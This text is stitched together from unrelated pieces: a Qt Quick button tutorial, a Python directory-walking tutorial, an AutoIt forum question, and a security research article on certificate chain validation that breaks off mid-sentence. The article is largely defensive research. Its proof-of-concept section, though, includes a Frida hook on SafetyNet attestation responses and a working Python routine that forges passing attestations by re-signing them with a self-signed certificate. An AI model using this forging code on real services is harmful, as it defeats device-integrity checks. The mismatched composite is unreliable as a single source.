The Custom Button wizard template adds a normal state and a down state to change the button background and text color when the button is clicked. You will now change the colors in all states. When you make changes to the button in the base state, they are automatically applied to the other states. However, the property values that have been explicitly changed in the down state are not changed automatically, and you have to change them separately in that state.

To change the button property values:

- Select the button background in Navigator to display its properties in Properties.
- In the Color field, select (Actions) > Reset to reset the button background color to the default color, white.
- In the Border Color field, select Actions > Set Binding to use the gradient color (#41cd52) as the border color. You can also use the color picker to change the color.
- Press Enter or select OK to save the new value.
- In the Radius field, enter 20 to give the button rounded corners.
- In the States view, select the down state and modify the background and border color as above.
- Select the text item in Navigator to display its properties in Properties.
- In the Text Color field, select Actions > Reset to reset the text color to the default color, black.
- In the Font style field, select the B button to use the strong font.
- In the States view, select the down state to set the button text color to the same green as the border.
- Select File > Save or press Ctrl+S to save your changes.

Your button should now look something like this:

Learn Qt Quick - Property Bindings

An object's property can be assigned a static value which stays constant until it is explicitly assigned a new value. In this tutorial, the color values you set in Binding Editor are static. However, to make the fullest use of QML and its built-in support for dynamic object behavior, you can use property bindings that specify relationships between different object properties. When a property's dependencies change in value, the property is automatically updated according to the specified relationship. Behind the scenes, the QML engine monitors the property's dependencies (that is, the variables in the binding expression). When it detects a change, it re-evaluates the binding expression and applies the new result to the property. For more information, see Property Binding.
Next, you will use the PushButton type in the main UI QML file, Screen01.ui.qml, to add two instances of the button to the UI and to modify their text labels.

Adding Buttons to the UI

You will now add two button instances to the UI and modify their labels.

- Double-click Screen01.ui.qml in Projects to open it in Form Editor.
- Drag and drop two instances of the PushButton type from Library to Form Editor.
- Select one of the buttons in Navigator to modify its id and text label in Properties.
- In the Id field, enter loginButton.
- In the Text field, enter Log In and select tr to mark the text translatable.
- Select the other button, and change its id to registerButton and its text label to Create Account. Again, mark the text translatable.
- When an element is selected, selection handles are displayed in its corners and on its sides. Use the selection handles to resize the buttons so that the text fits comfortably on the button background. In this tutorial, the button width is set to 120 pixels.
- Move the cursor over the selected button to make the selection icon appear. You can now drag the button to another position in Form Editor. Use the guidelines to align the buttons below the page title.
- Select File > Save or press Ctrl+S to save your changes.

The first iteration of your UI is now ready and should look something like this in the Design mode and live preview:

Learn Qt Quick - QML Ids

Each QML type and each instance of a QML type has an id that uniquely identifies it and enables other objects' properties to be bound to it. An id must be unique, it must begin with a lower-case letter or an underscore character, and it can contain only letters, numbers, and underscore characters. For more information, see The id Attribute.

Next Steps

To learn how to add more UI controls and position them on the page using anchors and layouts so that the UI is scalable, see the next tutorial in the series, Log In UI - Part 2. For a more advanced example of creating a menu button and using it to construct a button bar, see Side Menu.

Files:

- loginui1/PushButton.ui.qml
- loginui1/Screen01.ui.qml
- loginui1/imports/loginui1/Constants.qml
- loginui1/imports/loginui1/qmldir
- loginui1/loginui1.qml
- loginui1/loginui1.qmlproject

Available under certain Qt licenses.
Overview

- Introduction
- Print a directory tree
- List file sizes in a directory recursively
- Using os.walk() to get the total size of a directory
- Recursively copy from one directory to another
- Conclusion
- Reference links

Introduction

A common task when working with files is to walk through a directory, that is, to recursively get every file in every directory starting in some location. The Python 3 os module has several functions useful for working with files and directories. One in particular, os.walk(), is useful for recursively going through a directory and getting its contents in a structured way. These examples will show you a couple of options for walking a directory recursively.

Print a directory tree

This example will recursively walk through a directory and only print out the names of directories. It will ignore files.

# print_dirs.py
import os

def print_dirs_recursively(root_dir):
    root_dir = os.path.abspath(root_dir)
    print(root_dir)
    for item in os.listdir(root_dir):
        item_full_path = os.path.join(root_dir, item)
        if os.path.isdir(item_full_path):
            print_dirs_recursively(item_full_path)

List file sizes in a directory recursively

You can implement the walk yourself by getting the contents of a directory, checking whether each entry is a file or a directory, and recursing. This example provides a function that will recurse through a directory and print out every file with its size.

# recurse_dir.py
import os

# Print every file with its size, recursing through dirs
def recurse_dir(root_dir):
    root_dir = os.path.abspath(root_dir)
    for item in os.listdir(root_dir):
        item_full_path = os.path.join(root_dir, item)
        if os.path.isdir(item_full_path):
            recurse_dir(item_full_path)
        else:
            print("%s - %s bytes" % (item_full_path, os.stat(item_full_path).st_size))

Using os.walk() to get the total size of a directory

There's nothing wrong with the examples above, but there is a more powerful way to go through directories recursively, and that is with the os.walk() function. The os.walk() function is powerful because it gives some structure to the recursion. In the previous examples, if we wanted a list of directories and a list of files for each directory we recurse into, we'd have to build them ourselves. With os.walk() we get, for every directory, a tuple that contains the path, a list of directories, and a list of files. You can walk a directory top-down or bottom-up. It defaults to top-down, which is usually more convenient and expected.

This example will walk through a directory and sum up the total file sizes. Note that the file names yielded by os.walk() are relative to dirpath, so they must be joined with it before calling os.stat().

# dir_size.py
import os

def dir_size(root_dir):
    total_size = 0
    for (dirpath, dirs, files) in os.walk(root_dir):
        for filename in files:
            # The names in `files` are relative to dirpath, so join them
            # with it to get a usable path.
            file_full_path = os.path.join(dirpath, filename)
            file_size = os.stat(file_full_path).st_size
            total_size += file_size
            print("%s - %s bytes" % (file_full_path, file_size))
    print("Total size: %d" % total_size)

if __name__ == '__main__':
    # Get the full size of the home directory
    dir_size(os.path.expanduser("~"))

Recursively copy from one directory to another

The shutil module in the standard library provides a function called shutil.copytree() which will copy one directory tree to a new location. It requires the target directory to be non-existent, though: it will fail if the destination directory exists. The function demonstrated below will copy to a target directory even if it already exists. It will overwrite files if they already exist and create directories if needed.
# copy_recursive.py
import os
import shutil
import sys
from pathlib import Path

def copy_recursive(source_base_path, target_base_path):
    """
    Copy a directory tree from one location to another.

    This differs from shutil.copytree() in that it does not require the
    target destination to not exist. This will copy the contents of one
    directory in to another existing directory without complaining.

    It will create directories if needed, but notify if they already existed.
    It will overwrite files if they exist, but notify that they already existed.

    :param source_base_path: Directory path
    :param target_base_path: Directory path
    :return: None
    """
    if not Path(source_base_path).is_dir() or not Path(target_base_path).is_dir():
        raise Exception("Source and destination are not both directories.\nSource: %s\nTarget: %s" % (
            source_base_path, target_base_path))

    for item in os.listdir(source_base_path):
        # Directory
        if os.path.isdir(os.path.join(source_base_path, item)):
            # Create destination directory if needed
            new_target_dir = os.path.join(target_base_path, item)
            try:
                os.mkdir(new_target_dir)
            except OSError:
                sys.stderr.write("WARNING: Directory already exists:\t%s\n" % new_target_dir)

            # Recurse
            new_source_dir = os.path.join(source_base_path, item)
            copy_recursive(new_source_dir, new_target_dir)
        # File
        else:
            # Copy file over
            source_name = os.path.join(source_base_path, item)
            target_name = os.path.join(target_base_path, item)
            if Path(target_name).is_file():
                sys.stderr.write("WARNING: Overwriting existing file:\t%s\n" % target_name)
            shutil.copy(source_name, target_name)

Conclusion

After reading this, you should be able to walk through a directory recursively and get the file information you need.
AD UDF - Performance improvements
By water, in AutoIt General Help and Support

Similar Content

- By Nas

  I was stuck on changing some attributes of my user account for some reason; please check the script below:

  #include <AD.au3>
  #RequireAdmin

  _AD_Open()

  ; this portion works just fine
  _AD_ModifyAttribute("User.a", "GivenName", "John")
  _AD_ModifyAttribute("User.a", "displayName", "John, Smith")

  ; this portion I can't get to work
  _AD_ModifyAttribute("User.a", "Surname", "Smith")
  _AD_ModifyAttribute("User.a", "City", "Orlando")
  _AD_ModifyAttribute("User.a", "State", "FL")
  _AD_ModifyAttribute("User.a", "country", "US")

  _AD_Close()

  Basically the top portion for the given name and display name works perfectly, but the other portion I am unable to get to work.
Chain of Fools: An Exploration of Certificate Chain Validation Mishaps

01. Introduction

Typically, when software needs to leverage cryptography, developers use libraries or APIs that abstract many details away from them. They don't need to fully understand how TLS handshakes work to create a TLS socket, nor do they need to understand the cryptographic primitives used to encrypt SSH traffic when making SSH connections. However, some abstractions are leaky, and a better understanding is required to get things right. One example is validation of certificate chains, which is required when using APIs like Android SafetyNet or Android Protected Confirmation, validating remote attestations (like those provided by FIDO2 authenticators), or processing JSON Web Tokens that include signatures with associated X509 chains.

Applied cryptography can be hard even when using cryptographic libraries. For example, many cryptographic libraries make it difficult or non-obvious to properly validate certificate chains. Generally speaking, it's not because of defects in the implementation of primitives, but rather the difficulty of designing usable cryptographic APIs and providing clear, unambiguous documentation.

The Internet is full of bad guidance regarding the implementation of common cryptographic workflows. Advice on validating certificate chains is no exception. Oftentimes, this advice instructs the developer to (unknowingly) add untrusted intermediates as trusted roots when building certificate chains, which breaks the chain of trust. This allows an attacker to provide an otherwise valid certificate chain that chains up to a "fake" root, which will cause certificate chain validation to succeed when it shouldn't.

02. An Observation: The Genesis of this Research

While we were working on a prototype that made use of the Android Protected Confirmation API, which includes a necessary step of validating an attestation certificate chain, we noticed that there wasn't an obvious way of safely validating such a certificate chain (one that includes untrusted intermediates) with the pyOpenSSL Python module. We also recalled a conversation with one of our colleagues, Adam Goodman, about this being a problem he ran into with the same module.

In particular, when creating an X509StoreContext object for a chain with a depth greater than 1 (e.g., one that includes untrusted intermediates), the default behavior is to treat all certificates added to the X509Store object as trusted. As such, if a developer intends to build up a chain of trust by iteratively adding certificates to this store, starting with the root and n intermediates and ultimately terminating in the leaf certificate, the validation will appear successful if any of the intermediates added to the store signed the leaf certificate.

This is particularly troubling when a developer is given n untrusted intermediates that could be controlled by an adversary, since the adversary could artificially create a "fake" signing certificate that signs an untrustworthy leaf certificate. Even if the developer has made a policy decision ahead of time about which attestation roots are trusted, and they add those to the trust store, the chain of trust is broken and the certificate validation will succeed if an attacker manages to get a "fake" root into the list of untrusted intermediates that are added to the store.
from OpenSSL.crypto import FILETYPE_PEM, load_certificate
from OpenSSL.crypto import X509Store, X509StoreContext
from six import b

root_cert_pem = b("""<snip>""")
intermediate_cert_pem = b("""<snip>""")
leaf_cert_pem = b("""<snip>""")

root_cert = load_certificate(FILETYPE_PEM, root_cert_pem)
intermediate_cert = load_certificate(FILETYPE_PEM, intermediate_cert_pem)
leaf_cert = load_certificate(FILETYPE_PEM, leaf_cert_pem)

store = X509Store()
store.add_cert(root_cert)
store.add_cert(intermediate_cert)

store_ctx = X509StoreContext(store, leaf_cert)

# Will succeed if the intermediate signed the leaf, even if
# the root didn't sign the intermediate.
print(store_ctx.verify_certificate())

Recognizing that this was an issue, and still needing a way to properly validate a certificate chain containing untrusted intermediates, Adam made a change to the pyOpenSSL module to add support for including a list of untrusted intermediates when constructing an X509StoreContext object, and submitted a pull request to the pyOpenSSL repository on GitHub. This was in June 2016, and as of this writing the PR has not been merged. It's worth noting that this is not due to oversight or lack of caring by the maintainers of pyOpenSSL; because the change is a sensitive one, and in a cryptographic library at that, they've been hesitant to merge the PR without first getting the right reviewers in front of it. This is a good reason.

03. Doing Things the "Right" Way With a Non-Obvious API

Although it's not immediately obvious (or at least it wasn't to us and our colleague Adam), there is a way to correctly validate a certificate chain using the API mentioned above. The solution is simple, but the API doesn't really spell it out for us. Consider the following example from a test in the letsencrypt/boulder repository on GitHub:

def test_issuer():
    """
    Issue a certificate, fetch its chain, and verify the chain and
    certificate against test/test-root.pem.

    Note: This test only handles chains of length exactly 1.
    """
    certr, authzs = auth_and_issue([random_domain()])
    cert = urllib2.urlopen(certr.uri).read()
    # In the future the chain URI will use HTTPS so include the root certificate
    # for the WFE's PKI. Note: We use the requests library here so we honor the
    # REQUESTS_CA_BUNDLE passed by test.sh.
    chain = requests.get(certr.cert_chain_uri).content
    parsed_chain = OpenSSL.crypto.load_certificate(OpenSSL.crypto.FILETYPE_ASN1, chain)
    parsed_cert = OpenSSL.crypto.load_certificate(OpenSSL.crypto.FILETYPE_ASN1, cert)
    parsed_root = OpenSSL.crypto.load_certificate(OpenSSL.crypto.FILETYPE_PEM,
                                                  open("test/test-root.pem").read())

    store = OpenSSL.crypto.X509Store()
    store.add_cert(parsed_root)

    # Check the chain certificate before adding it to the store.
    store_ctx = OpenSSL.crypto.X509StoreContext(store, parsed_chain)
    store_ctx.verify_certificate()
    store.add_cert(parsed_chain)

    # Now check the end-entity certificate.
    store_ctx = OpenSSL.crypto.X509StoreContext(store, parsed_cert)
    store_ctx.verify_certificate()

In the above example, the intermediate certificate is validated against the root before being added to the X509Store object. Only if the intermediate validation passes is it added to the trust store and used to validate the end-entity certificate. Even though this works, as it does correctly validate the certificate chain, it only supports chains of length 1.
Although it would be possible to update this function to support chains of greater depth, the code could get messy quickly, and the opportunity for mistakes to arise would only increase. One of the biggest problems here is that the pyOpenSSL API simply refers to the operation of adding a cert to the X509Store object as add_cert. This is problematic because the API makes sense if the developer makes the correct assumption about how it works, but it can be hugely problematic if they make the wrong assumption, as we did. For example, if the method were renamed to add_trusted_cert or similar, this would be incorrect if the developer uses the API "correctly." Perhaps one way of combating this would be to only allow the developer to add one cert at a time to the X509Store, but this has other usability limitations, and sometimes could be undesirable (for example in unit tests).

04. Bad Advice on the Internet

Google's SafetyNet documentation gives developers a series of steps they must follow to verify the origin of a signed SafetyNet attestation: extract the certificate chain from the JWS message, validate the chain and confirm that the leaf certificate was issued to the expected hostname, use that certificate to verify the signature of the JWS message, and check the payload, making sure the timestamp has been validated and that the nonce, package name, and hashes of the app's signing certificate(s) match the expected values.

The example code in the SafetyNet server example Java project uses javax.net.ssl.TrustManager under the hood to validate the certificate chain by means of Google's JsonWebSignature library. The default trust manager chains up to the system roots of trust, and the example code validates that a path can be built from the leaf certificate provided by SafetyNet up to a system root of trust, likely through intermediate certificates that are also provided in the SafetyNet attestation response. The example code does things right, but there are many steps performed during the validation process that are not explicitly stated by the documentation.

Looking at results for "validate SSL certificate chain" on sites like StackOverflow and GitHub, we see a worrying pattern. Let's look at several of these examples.

The first example we'll look at is one of the first results for "Golang verify certificate chain" on Google, which you can find here. In particular, the following lines are used to import the intermediate certificates, which are then used as trusted roots:

rootPEM, err := ioutil.ReadFile(os.Args[3]) // cert-chain PEM
if err != nil {
    log.Fatal(err)
}

roots := x509.NewCertPool()
ok := roots.AppendCertsFromPEM([]byte(rootPEM))
if !ok {
    panic("failed to parse root certificate")
}

This method of validating a certificate chain implicitly trusts all the intermediates in the chain. If there exists a self-signed certificate in the chain, it will be treated as a trusted root, regardless of system trust settings. As a result, an intermediary could modify payload contents, re-sign the payload with a new key, and then attach the new leaf certificate and issuing CA to the request.

Searching for a method to validate certificate chains using Python might lead you to this StackOverflow question. The first response, published in 2015, advises the question's author to use pyOpenSSL's X509StoreContext to validate the chain, which falls victim to the issues described earlier. This is in part due to incomplete documentation and bad advice on the internet, and in part due to unit tests for pyOpenSSL that perform the likely-undesirable validation of a certificate with intermediates as trusted roots.
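For contrast, here is what a safe use of the store-based pyOpenSSL API can look like for chains of arbitrary depth. This is our own sketch rather than code from any of the projects discussed above: it generalizes the Boulder test by verifying each candidate intermediate against the store before promoting it to trusted, and it assumes the intermediates are ordered so that each one is issued by a certificate already in the store. (Newer pyOpenSSL releases have since grown an explicit argument for untrusted chain certificates on X509StoreContext, which is the better option where available.)

# verify_chain.py - illustrative sketch, not from any project discussed above
from OpenSSL.crypto import X509Store, X509StoreContext

def verify_chain_of_trust(leaf_cert, untrusted_intermediates, trusted_roots):
    store = X509Store()
    for root in trusted_roots:
        # Policy decision made ahead of time: only these are trusted.
        store.add_cert(root)

    # Promote an intermediate into the store only after it has itself been
    # verified against the certificates we already trust.
    for intermediate in untrusted_intermediates:
        X509StoreContext(store, intermediate).verify_certificate()
        store.add_cert(intermediate)

    # Finally, check the end-entity certificate; verify_certificate()
    # raises X509StoreContextError on failure.
    X509StoreContext(store, leaf_cert).verify_certificate()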
This StackOverflow question asks how to verify a certificate chain using the openssl verify command. In this case, there is a correct response (instructing the poster to use the -untrusted option), but there is also another high-rated answer that suggests using cat to combine the roots and intermediates into a single list of certificates, all of which will be considered trusted roots. A question attached to this answer asks "Will this actually verify the intermediate cert against the root cert?" to which someone replies "It does. I just re-ran the commands with a chain that I know is correct."

Joel Sandin brought this same issue up on the cryptography-dev mailing list in August of 2016. He says: "It's clear from what I've found online that developers are confused and may have introduced vulnerabilities into their code." It is fair to assume this is the case: it seems relatively unlikely that users who followed the misleading advice would check back in once updated answers were posted calling out the dangers of the incorrect methods of certificate chain validation.

The failure mode is insidious: there are no false negatives introduced by accidentally treating intermediate certificates as trusted roots, so unless validation methods are explicitly tested with input that includes a self-signed CA in the list of intermediates, this issue can go undetected.

This raises an important point. Software developers typically have deadlines. Oftentimes, they're incentivized to get their code working, not necessarily to get it right. When you hit a wall while trying to solve a tough problem, and you finally get it working, how often do you ask yourself if you solved the problem the right way? This reminds me of the following sentiment about losing your keys:

"It's frustrating to feel like your lost keys are always in the last place you look, but the alternative is to keep looking for them after you've found them." - u/droidpat on r/Showerthoughts, Reddit

That's the thing. When doing anything with cryptography in software, you've got to keep looking for your keys even after you've found them.
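Returning to the openssl verify thread for a moment, the safe command-line pattern is worth spelling out. It is wrapped in Python here only for consistency with the other examples (the file names are placeholders); the key point is that roots go in -CAfile and intermediates go in -untrusted:

# verify_cli.py - the safe `openssl verify` invocation (placeholder file names)
import subprocess

# Intermediates passed via -untrusted are used only for path building;
# they must still chain up to a certificate in -CAfile to verify.
# Never `cat` roots and intermediates into one -CAfile bundle: that
# silently promotes the intermediates to trusted roots.
result = subprocess.run(
    ["openssl", "verify",
     "-CAfile", "root.pem",
     "-untrusted", "intermediates.pem",
     "leaf.pem"],
    capture_output=True, text=True)
print(result.stdout or result.stderr)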
05. Misuse-resistant APIs

Security practitioners have historically tended to blame the user: every single security issue, after all, is due to some sort of "human error." It's a tidy excuse that allows the conversation to end there, but a new, more holistic model of security is growing. This new model considers how easy it is for a developer to misuse a primitive. This is particularly important in the field of cryptography, where seemingly small mistakes can have massive consequences (ex: nonce reuse). Misuse resistance is relevant at all levels, from the design of primitives up to the high-level APIs.

AES-GCM-SIV, for example, is designed to minimize the impact of nonce misuse. EdDSA signatures are deterministic, protecting against the kinds of mistakes that caused the leak of the PS3 content signing key via reuse of k values in the ECDSA scheme. Miscreant is a library developed by Tony Arcieri with the explicit goal of providing misuse-resistant APIs for common cryptographic tasks. Miscreant consists of libraries in five different languages implementing misuse-resistant primitives. Other libraries (such as libsodium) may be built on primitives that are not misuse resistant, but expose APIs such that misusing the primitives is hard or impossible. Many older cryptographic primitives are still used purely due to inertia.

Trail of Bits points this out well in their "Seriously, stop using RSA" post: there are myriad ways to misuse RSA, many of which are due to subtle implementation concerns that developers would not know about without stronger cryptography knowledge. But rather than lamenting that developers are not sufficiently knowledgeable about padding oracles, the path forward involves building tooling that does not require domain-specific knowledge to use.

06. Misuse Resistance and Legacy Cryptography

X509 parsing is a minefield, and the tooling built around it (much of it bindings to OpenSSL) has far too many knobs for the average developer to build safe applications. If you are expecting developers to implement certificate chain validation, providing explicit instructions is a minimum requirement, and providing tooling to do so is preferable. This is a rule of thumb that extends to any situation in which you are asking developers to perform some cryptographic step: we must ask "what knowledge is needed to do this correctly?", "what is the impact of misuse or improper implementation?", and "how can we reduce or eliminate the risk caused by a lack of developer cryptographic knowledge?".

Ideally, there should be no requirement that developers manually implement these steps: a service provider should maintain client libraries that implement all the necessary cryptographic checks without exposing intricacies to the developer when it's not necessary. Google does a version of this by providing an online validation API for SafetyNet tokens, but it exists only for development purposes and is heavily rate limited.

07. Quantifying the Use of SafetyNet

Knowing that certificate chain validation is hard to get right, and that it's a necessary step in validating SafetyNet attestations, we set out to understand how widely used this API is among popular Android applications, and among applications in different categories. The reasons for this are twofold: for one, the prevalence of this API is useful information in its own right, and two, because of the necessary certificate chain validation step, knowing how popular this API is gives us an idea of how many implementations could potentially be vulnerable to incorrect certificate chain validation logic.

At a high level, answering these questions required the following steps: 1) acquiring a list of popular Android applications by number of installs and a ranking of applications, 2) downloading the Android Packages (APKs) associated with these applications en masse, and 3) analyzing the corpus of APKs to determine the use of the SafetyNet Attestation API. In the following sections, we describe the methods we used to accomplish the three aforementioned steps.

Acquiring a List of Top Android Apps

In order to find out which of the top Android apps are using the SafetyNet Attestation API, we first needed to acquire a source that outlined what those top apps were. In our search for a reliable source, we found that there were some smaller lists that detailed dozens of apps, as well as paid app store analytics services that provided these sorts of lists. However, we wanted our work to be reproducible by other researchers, so we opted to use Android Rank, which has been collecting application metrics since 2011 and has been used by others for similarly large analyses.
Using data from their site, we were able to obtain a list of the most installed Android applications and assemble a list of the top Android applications for 32 general application categories (e.g., Communication, Finance, Social, etc.) and 17 categories of games (e.g., Action, Puzzles, Sports, etc.). In total, this resulted in a list of 24,296 apps.

Building a Corpus of Applications

After compiling a list of Android applications, the next thing we had to do was acquire as many of those APKs as possible. Currently, Google does not allow automated downloading of APKs from the Google Play Store; moreover, you are restricted to downloading apps for your particular region. As a result, we decided to build our corpus of applications from APK downloading services such as APKPure and apkmonk. These sites allow users to download APKs for both current and older versions of apps, apps from different regions, etc., so that they can be sideloaded, or in our case, analyzed.

Because downloading such a large number of applications by hand was intractable, we opted to automate this process. We did so by building off the work done by the Open GApps Project, which downloads Google Apps packages from APK downloading services like the two mentioned above. Using the scripts that we created, we were able to download 98% (23,768/24,296) of these applications. We were unable to download all of them for two reasons: 1) we did not limit our list to free apps, and 2) AndroidRank's list of the most popular applications includes apps that are no longer available in general, or on the two sites that we used.

Analyzing APKs

In order to determine the use of SafetyNet by a particular application, we perform a series of progressively more intensive checks on the application. Before getting started, it's helpful to describe what an APK is and what it looks like under the hood. APKs can be thought of as zip files that contain the code for the application, the resources, assets, and other files.

(Diagram: modified version of a diagram by Ryantzj.)

This top level, once the APK is unzipped, is where our first set of checks for the use of SafetyNet happens. We start by checking for the existence of a SafetyNet properties file. Properties files are often used to store configuration information for applications. As it relates to this work, there will sometimes be a file named play-services-safetynet.properties. This file contains information relating to the version of SafetyNet that is being used by the application. It is important to note that the existence of this file only means that one of the four SafetyNet APIs is being used, but it doesn't tell us whether the one being used is the Attestation API. In addition to the SafetyNet Attestation API, there are SafetyNet APIs for Safe Browsing, reCAPTCHA, and for verifying apps. Nevertheless, in our process, we store this information so that we can catalog which versions of SafetyNet are being used.

After checking for the existence of a SafetyNet properties file, we analyze the contents of the Android Manifest. The Android Manifest is an XML file that contains information such as the app's package name, the activities and services used by the app, the permissions that the app needs to operate, etc. In the Android Manifest, we are specifically looking for the key com.google.android.safetynet.ATTEST_API_KEY. (A rough sketch of these first two checks follows; the final check on classes.dex is described right after it.)
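The sketch below is an illustration of the approach rather than the exact tooling we used. Note that the AndroidManifest.xml inside an APK is binary XML, so the raw byte search here (trying both UTF-8 and UTF-16 encodings of the key name) is only a heuristic; a real implementation would use a proper binary-XML parser.

# apk_safetynet_check.py - rough sketch of the first two checks
import zipfile

ATTEST_KEY = b"com.google.android.safetynet.ATTEST_API_KEY"

def check_apk(apk_path):
    with zipfile.ZipFile(apk_path) as apk:
        # Check 1: a SafetyNet properties file anywhere in the archive.
        has_props = any(name.endswith("play-services-safetynet.properties")
                        for name in apk.namelist())
        # Check 2: the attestation key name in the (binary XML) manifest.
        manifest = apk.read("AndroidManifest.xml")
        has_key = (ATTEST_KEY in manifest or
                   ATTEST_KEY.decode().encode("utf-16-le") in manifest)
    return has_props, has_key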
Last, if we are unable to ascertain the use of the SafetyNet Attestation API from those two checks, we analyze the classes.dex file, searching specifically for the presence of "AttestationResponse" or an attestation API key.

Initial Results

Prior to our work, it was found that less than one percent of Android applications were using one of the SafetyNet APIs, among a sample of 3000 applications. This study took place back in 2017, just two years after SafetyNet was first introduced in 2015. Our study showed that the use of SafetyNet has since increased, to approximately 5.26% of the roughly 24 thousand apps that we were able to successfully analyze. The category that showed the largest use of SafetyNet was Finance at 18.52%, while the lowest was Tools (e.g., flashlight apps) at 1.62%. Among the most installed applications according to Android Rank, the use of SafetyNet proved to be higher than average at 10.82%.

(Charts: top 5 and bottom 5 categories by SafetyNet usage.)

In addition, we found that only 23% of the apps that we found to be using SafetyNet were using the latest version of the SafetyNet API, 17.0.0. The vast majority (62%) were using the previous version of the API, 16.0.0. Since the latest version was released on June 17th, we expect the percentage of applications using version 17.0.0 to increase.

Using More Advanced Approaches

Initially, when we began this research, we focused on trying to detect the use of the SafetyNet APIs by file existence and pattern matching, as mentioned above. This approach has its drawbacks, one of the largest being that the method calls we were looking for could be obfuscated, thwarting any direct or fuzzy string matching. In addition, by relying on the presence of the properties file to determine which versions of SafetyNet are being used, our figures would be biased toward the applications that use properties files as a configuration mechanism. Because of these limitations, we turned to other library detection mechanisms. Specifically, we decided to use LibScout.

LibScout works by first extracting profiles from original versions of a library; in our case, the .jars for the different versions of com.google.android.gms.play-services-safetynet. Using the profiles, LibScout statically detects the use of libraries in Android apps by building application profiles and then applying a pattern matching algorithm to check for the presence of a given library. If a given library is deemed to be present, LibScout outputs a similarity score between 0 and 1, where 1 means that a given library version was matched exactly.

Using LibScout, we analyzed a sample of 7,832 applications to see how the results compared to purely searching for strings within the APK file. We found that a higher percentage of applications were using the SafetyNet library: 7.2%. Similar to our analysis of the SafetyNet library versions that relied on the properties file, we found that most (86%) of the applications we analyzed were not using the latest version. Last, we found that the most popular app category using SafetyNet was Gaming at 11.2%.

Limitations

It is important to note that while our corpus of apps is larger than that of the study run in 2017, it is small compared to the entire population. Moreover, the sample that we collected contains more apps that can be categorized as games than any other category. Therefore, these results can't be generalized to the entire Android ecosystem.
Research Methodology When setting out to perform this research, we decided to approach the problem from a number of different angles simultaneously. In addition to determining how widely used the SafetyNet Attestation API is in certain verticals, we also wanted to explore what it would take to forge SafetyNet attestations. While some of us were looking into the possibility of modifying the SafetyNet attestation from the stance of a network MITM, our colleague Mikhail Davidov was looking into doing so through in-process hooking with the Frida instrumentation framework. Ultimately, we focused primarily on forging attestations through a mitmproxy Addon, but did confirm that this should also be possible through in-process hooking with Frida. In the spirit of sharing as much of our research process as possible, so as to enable further investigation by other researchers, we're including the following snippet below.

Java.perform(function() {
    var attResp = Java.use('com.google.android.gms.safetynet.SafetyNetApi$AttestationResponse');
    attResp.getJwsResult.implementation = function() {
        var jwsToken = this.getJwsResult();
        console.log(jwsToken);
        // Change the token here.
        return jwsToken;
    };
});

09. Proof of Concept To demonstrate this issue in action, we wrote several utilities: - An Android app that requests a SafetyNet attestation - A Flask web app that receives and incorrectly validates attestations - A tool to modify and re-sign the attestation, including a mitmproxy Addon You can access these three utilities on GitHub. Our Flask application makes use of the X509Context pattern that led to the investigation into these issues in the first place. jwsmodify contains a method modify_jws_and_forge_signature, which takes a JWS payload in raw bytes as input and performs a transformation. The transform function is used to modify the payload (for example, to set passing SafetyNet values by setting ctsProfileMatch and basicIntegrity to true). Finally, the payload is re-signed by a newly generated self-signed CA that is encoded back into the JWS. This allows us to forge SafetyNet assertions. We include a mitmproxy Addon with the JWS modification tools. By default, the Addon looks for SafetyNet attestations and sets them to passing. Our Flask application will validate both unmodified attestations and attestations modified by our tools. While our proof of concept tooling focuses on SafetyNet attestations in particular, the same tools should be applicable to the modification of any JWS payload that uses the x5c parameter to bundle certificate chains with the signature.
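To make the technique concrete, here is a minimal Python sketch of the re-signing idea. This is not the actual jwsmodify code; it assumes the third-party cryptography package and a validator that naively trusts whatever certificate arrives in the x5c header.

import base64
import datetime
import json

from cryptography import x509
from cryptography.hazmat.primitives import hashes, serialization
from cryptography.hazmat.primitives.asymmetric import padding, rsa
from cryptography.x509.oid import NameOID

def b64url_decode(s):
    return base64.urlsafe_b64decode(s + '=' * (-len(s) % 4))

def b64url_encode(b):
    return base64.urlsafe_b64encode(b).rstrip(b'=').decode('ascii')

def forge_attestation(jws):
    header_b64, payload_b64, _sig = jws.split('.')
    header = json.loads(b64url_decode(header_b64))
    payload = json.loads(b64url_decode(payload_b64))

    # Flip the attestation verdict to passing.
    payload['ctsProfileMatch'] = True
    payload['basicIntegrity'] = True

    # Generate a throwaway key and a self-signed certificate.
    key = rsa.generate_private_key(public_exponent=65537, key_size=2048)
    name = x509.Name([x509.NameAttribute(NameOID.COMMON_NAME, u'attest.android.com')])
    now = datetime.datetime.utcnow()
    cert = (x509.CertificateBuilder()
            .subject_name(name).issuer_name(name)
            .public_key(key.public_key())
            .serial_number(x509.random_serial_number())
            .not_valid_before(now)
            .not_valid_after(now + datetime.timedelta(days=1))
            .sign(key, hashes.SHA256()))

    # Swap our certificate into x5c and re-sign; a validator that never
    # chains x5c back to a trusted root will accept the result.
    header['alg'] = 'RS256'
    header['x5c'] = [base64.b64encode(
        cert.public_bytes(serialization.Encoding.DER)).decode('ascii')]
    signing_input = (b64url_encode(json.dumps(header).encode()) + '.' +
                     b64url_encode(json.dumps(payload).encode()))
    signature = key.sign(signing_input.encode('ascii'),
                         padding.PKCS1v15(), hashes.SHA256())
    return signing_input + '.' + b64url_encode(signature)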
10. How We Can Make Things Better There are a number of steps that developers can take to prevent improper certificate chain validation or other cryptography pitfalls. - Use high-level libraries and abstractions wherever possible. Ideally, these libraries will shield you from having to deal with anything cryptographic. For example, the NSURLSession API for iOS and macOS allows developers to download data from or upload data to HTTPS URLs, but doesn't require knowledge of the lower-level cryptographic primitives that it builds upon. - If you need to interact directly with cryptographic libraries or APIs, choose misuse-resistant ones where possible, such as Miscreant and libsodium. - When doing anything with cryptography, don't assume that because something works, it's correct. In other words, keep looking for your keys even after you've found them. ;) - Ask for help! This can come in the form of requesting additional documentation or clarification from vendors, or by bringing up questions in online communities. - Be skeptical. The stakes can be pretty high when getting things wrong with cryptography, and the failure modes are often subtle. Also, vendors should take great care when requiring low-level cryptographic steps of any kind from developers integrating with their APIs. Ideally, they should provide client libraries that abstract as many of these details away from the user as possible and, failing that, should provide detailed documentation. We can also work to prevent these kinds of mishaps as a security community, by educating developers and providing help when we see it's needed (hat tip to Scott Arciszewski of Paragon Initiative for his contributions to the Stack Overflow community, among other things). Making suggestions without assigning blame not only helps individuals, but it also improves the perception of security practitioners in the public eye, hopefully making people less shy about asking questions in the future. 11. Next Steps for Research In addition to testing incorrect certificate chain validation implementations with the Android SafetyNet API, this research should also apply anywhere untrusted intermediate certificates are provided through an untrusted channel, used to build a chain of trust, and then validated against a root of trust. Other examples that come to mind are verifying a signed message from the Android Protected Confirmation API, or validating a WebAuthn attestation statement. Additionally, it may be possible to use the 